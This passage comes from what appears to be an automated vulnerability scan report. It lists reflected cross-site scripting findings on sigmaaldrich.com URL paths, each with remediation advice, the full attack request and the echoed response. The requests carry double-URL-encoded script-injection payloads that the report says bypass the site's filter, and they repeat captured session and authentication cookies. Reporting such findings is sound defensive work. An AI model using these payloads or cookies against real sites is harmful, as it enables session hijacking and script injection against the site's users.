Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:41 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich6dbc9";alert(1)//713ae4d73e/images/white-bar.Par.0001.Image","E404") ;
   </script>
...[SNIP]...

1.471. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f6dd%2522%253balert%25281%2529%252f%252ff0e29a72b3a was submitted in the REST URL parameter 4. This input was echoed as 3f6dd";alert(1)//f0e29a72b3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images3f6dd%2522%253balert%25281%2529%252f%252ff0e29a72b3a/white-bar.Par.0001.Image HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:43 GMT
Content-Length: 28962
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images3f6dd";alert(1)//f0e29a72b3a/white-bar.Par.0001.Image","E404") ;
   </script>
...[SNIP]...

1.472. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e932d%2522%253balert%25281%2529%252f%252fa3a604110ab was submitted in the REST URL parameter 5. This input was echoed as e932d";alert(1)//a3a604110ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Imagee932d%2522%253balert%25281%2529%252f%252fa3a604110ab HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:45 GMT
Content-Length: 28962
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Imagee932d";alert(1)//a3a604110ab","E404") ;
   </script>
...[SNIP]...

1.473. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/fb-25x25 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/fb-25x25

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 208c2%2522%253balert%25281%2529%252f%252fb65ded2996b was submitted in the REST URL parameter 1. This input was echoed as 208c2";alert(1)//b65ded2996b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc208c2%2522%253balert%25281%2529%252f%252fb65ded2996b/medialib/sigma-aldrich/social/fb-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:37 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc208c2";alert(1)//b65ded2996b/medialib/sigma-aldrich/social/fb-25x25","E404") ;
   </script>
...[SNIP]...

1.474. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/fb-25x25 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/fb-25x25

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86b1d%2522%253balert%25281%2529%252f%252fc51a2aeb27e was submitted in the REST URL parameter 2. This input was echoed as 86b1d";alert(1)//c51a2aeb27e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib86b1d%2522%253balert%25281%2529%252f%252fc51a2aeb27e/sigma-aldrich/social/fb-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:39 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib86b1d";alert(1)//c51a2aeb27e/sigma-aldrich/social/fb-25x25","E404") ;
   </script>
...[SNIP]...

1.475. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/fb-25x25 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/fb-25x25

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ceee4%2522%253balert%25281%2529%252f%252f5e7262edb02 was submitted in the REST URL parameter 3. This input was echoed as ceee4";alert(1)//5e7262edb02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrichceee4%2522%253balert%25281%2529%252f%252f5e7262edb02/social/fb-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
